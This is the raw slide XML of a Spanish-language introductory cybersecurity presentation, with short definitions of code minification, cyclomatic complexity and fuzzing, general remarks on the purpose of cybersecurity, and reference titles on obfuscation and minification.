              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="B31166"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="193330"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Minificar</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="193330"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Consiste en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>reducir el tamaño de un código fuente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mediante la eliminación de comentarios, saltos de línea o espacios en blanco innecesarios, entre otros.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>El resultado es el código introducido al inicio, pero compactado, menos legible pero más eficiente. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="CuadroTexto 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EE9E963-263D-FC3B-B504-1208E36F9D3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2192905" y="4648617"/>
            <a:ext cx="6693610" cy="954107"/>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a:solidFill>
                  <a:srgbClr val="193330"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Referencias: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="193330"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>Ofuscar. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="193330"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Aplicaciones de la ofuscación</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="193330"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" err="1">
                <a:solidFill>
                  <a:srgbClr val="193330"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>Minificar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="193330"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="467886"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
                <a:hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Proceso de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" err="1">
                <a:solidFill>
                  <a:srgbClr val="193330"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
                <a:hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>minificación</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="193330"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="193330"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>Código fuente. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="193330"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
                <a:hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Métodos de transformación del código para su ejecución</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="193330"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Imagen 4" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73B47E80-A026-10F5-2513-75181C4DAB42}"/>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29891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54C3A-FB3A-4D21-0D17-73ACE73A9BEA}"/>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88A1DC5-CA43-1C58-E531-4FC457D86450}"/>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CCA611EA-43F3-0FAE-27DB-B35BDB0E3C05}"/>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Conceptos técnicos de Ciberseguridad</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21A6586D-D831-CB56-B183-01F39AA6A09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4" name="Imagen 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19F774E0-81E5-916C-39EA-F09A43404B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8918" y="2089954"/>
            <a:ext cx="4016086" cy="3219734"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectángulo 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D30AE523-3A33-2C72-881C-503CC7B8C289}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="402193" y="2993867"/>
            <a:ext cx="4944507" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="193330"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Complejidad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="193330"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="193330"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>ciclomática</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="193330"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </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cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Métrica del software en ingeniería del software que proporciona una </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>medición cuantitativa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>de la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>complejidad lógica </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>de un programa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="CuadroTexto 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40871E0F-CC00-F9A4-1924-B272311CB2C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2217068" y="5082247"/>
            <a:ext cx="6645283" cy="738664"/>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Referencias</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>Complejidad </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>ciclomática</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Complejidad </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>ciclomática</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t> y calidad del código</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectángulo 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEF24CE0-244D-42C2-CB76-CC8E28B21BB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="402193" y="1083942"/>
            <a:ext cx="9737666" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="193330"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Fuzzing</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="193330"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Probar de forma automatizada o semiautomatizada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, todo el posible conjunto de datos de entrada de un software mediante registros específicos o generación aleatoria.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Imagen 2" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BF49395-FDF9-4BE2-9A3A-C976A197897D}"/>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019493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D2E89-146D-13EA-8EAF-4B29F6F943A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6E935D1-8132-7D1C-A2CF-C51F3F73A5D8}"/>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F7C3D33-2CEB-B744-49EB-06D95CF65578}"/>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Ciberseguridad y su importancia</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{298CF1C0-6F74-1DD8-A57C-B6B36777393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6F4E3CB5-9418-B94E-ADCB-EB4DF6405C4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1030836"/>
            <a:ext cx="9737666" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>La ciberseguridad es la suma de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>procesos y herramientas que se emplean para proteger anticipadamente o defender de ciberataques </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a dispositivos, sistemas electrónicos, servidores, redes y programas, de posibles ataques digitales.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Century Gothic"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Century Gothic"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Century Gothic"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Century Gothic"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="B31166"/>
              </a:solidFill>
              <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="La Ciberseguridad como parte esencial de la Transformación Digital | CTIC">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44838BDD-2A5B-D0C3-4A90-EF0F43AE5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011" y="2184998"/>
            <a:ext cx="6232177" cy="361897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nterfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{452CBFC1-D57C-EA8E-1896-92F1E54557B1}"/>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679001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D6D91-A89F-2E83-14A9-65FF9612C45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B138219-55D3-4CCD-1B5C-4F3F99E1E3B7}"/>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ACDF01C-481E-0191-1B3B-34DEFB01CCBA}"/>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¿Para qué sirve la Ciberseguridad?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C386C4D-6659-D972-9425-630D4F7B59C9}"/>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4" name="Picture 2" descr="Cómo generar confianza en un cliente? 13 tips que debes saber">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D06286D-E69A-8244-0002-05E10E8EB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8865" y="3358814"/>
            <a:ext cx="4625630" cy="2617444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Oval 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF0C99F9-0CF4-2AAF-23DB-DF80E5CAC7CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="417505" y="1285596"/>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7" name="Oval 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{743184ED-0C97-87FD-83C1-0A22648C90C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="417505" y="2848667"/>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 name="Oval 17">
            <a:extLst>
